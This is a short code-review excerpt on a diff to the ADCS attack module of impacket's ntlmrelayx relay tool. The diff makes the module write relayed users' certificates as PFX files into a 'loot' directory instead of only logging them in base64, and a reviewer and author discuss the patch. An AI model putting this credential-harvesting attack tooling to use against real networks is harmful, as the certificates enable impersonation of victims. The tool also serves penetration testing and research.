impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py

```diff
@@ -76,7 +77,18 @@ def _run(self):
         certificate = response.read().decode()
 
         certificate_store = self.generate_pfx(key, certificate)
-        LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))
+        LOG.info("Writing certificate to %s/%s.pfx" % (self.config.lootdir, self.username))
+        try:
+            if not os.path.isdir(self.config.lootdir):
+                os.mkdir(self.config.lootdir)
+            f = open("%s/%s.pfx" % (self.config.lootdir, self.username), 'wb')
+            f.write(certificate_store)
+            f.close()
+            LOG.info("Certificate successfully written to file")
+        except Exception as e:
+            LOG.info("Unable to write certificate to file, printing B64 of certificate to console instead")
+            LOG.info("Base64 certificate of user %s: \n%s" % (self.username, base64.b64encode(certificate_store).decode()))
+            pass
```

Comment:
Please see my pull request #1440. Does the same thing with less code. More easier to read.

Reply:
@666Danger-sudo implemented your solution for opening the file to write the certificate.